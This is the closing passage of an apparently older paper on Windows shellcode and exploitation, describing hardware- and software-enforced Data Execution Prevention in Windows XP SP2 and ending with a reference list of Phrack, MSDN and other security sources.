exploits. In Windows XP SP2, DEP is enforced by both hardware and software. Hardwareenforced DEP marks all memory locations in a process as non-executable unless the 17 location explicitly contains executable code. DEP helps prevent buffer overflow attacks by intercepting them and raising an exception. Both “Advanced Micro Devices™” (AMD) and Intel® Corporation have defined and shipped Windowscompatible architectures that are compatible with DEP. An additional set of data execution prevention security checks have been added to Windows XP SP2. These checks, known as software-enforced DEP, are designed to mitigate exploits of exception handling mechanisms in Windows. Software-enforced DEP runs on any processor which is capable of running Windows XP SP2. By default, softwareenforced DEP only protects limited system binaries, regardless of the hardwareenforced DEP capabilities of the processor. While the battle between good and evil goes unremittingly, I hope to have presented a brief account of state-of-the-art methods that have existed for quite a while. Thanks for spending your time reading. References [1] The Last Stage of Delirium Research Group (LSD), Windows Assembly Components http://lsd-pl.net/papers.html. [2] Microsoft Corporation. Microsoft Developer Network Library http://msdn.microsoft.com/library/ [3] Phrack Magazine, History and Advances in Windows Shellcode http://www.Phrack.org /show.php?p=62&a=7 [4] Phrack Magazine, Bypassing 3rd Party Windows Buffer Overflow Protection http://www.Phrack.org /show.php?p=62&a=5 [5] Phrack Magazine, Smashing The Stack For Fun And Profit http://www.Phrack.org /show.php?p=49&a=14 [6] Phrack Magazine, Win32 Buffer Overflows (Location, Exploitation and Prevention) http://www.Phrack.org /show.php?p=55&a=15 [7] Phrack Magazine, The Frame Pointer Overwrite http://www.Phrack.org /show.php?p=55&a=8 [8] MSDN Magazine, Feb. 2002, “An In-Depth Look into the Win32 Portable Executable File Format” by Matt Pietrek [9] MSDN Magazine, Mar. 1994, “Peering Inside the PE: A Tour of the Win32 Portable Executable File Format” by Matt Pietrek [10] Under the Hood, May 1996, Microsoft System Journals (MSJ), “TIB (Thread Information Block) in the buff” by Matt Pietrek [11] Under the Hood, Jan 1997, Microsoft System Journals (MSJ), SEH “A Crash Course on the Depths of Win32™ Structured Exception Handling” by Matt Pietrek [12] Under the Hood, Jan 2001, Microsoft System Journals (MSJ), “IA-64 Registers” by Matt Pietrek [13] The Undocumented Functions, by Tomasz Nowak http://undocumented.ntinternals.net. [14] Microsoft Tech Net, “Changes to Functionality in Microsoft Windows XP Service Pack 2”, part 3, Memory Protection Technologies http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/default.mspx [15] CodeGuru, “Three Ways to Inject Your Code into another Process” by Robert Kuster. http://www.codeguru.com/Cpp/W-P/system/processesmodules/ 18 [16] The Code Project, “API Monitoring Unleashed” by Parag Paithankar http://www.codeproject.com/system/api_monitoring_unleashed/ [17] Snort, The Open Source Network Intrusion Detection System www.Snort.org [18] Metasploit Framework, complete environment for writing, testing, and using exploit code, www.metasploit.com [19] Google the Oracle! www.Google.com 19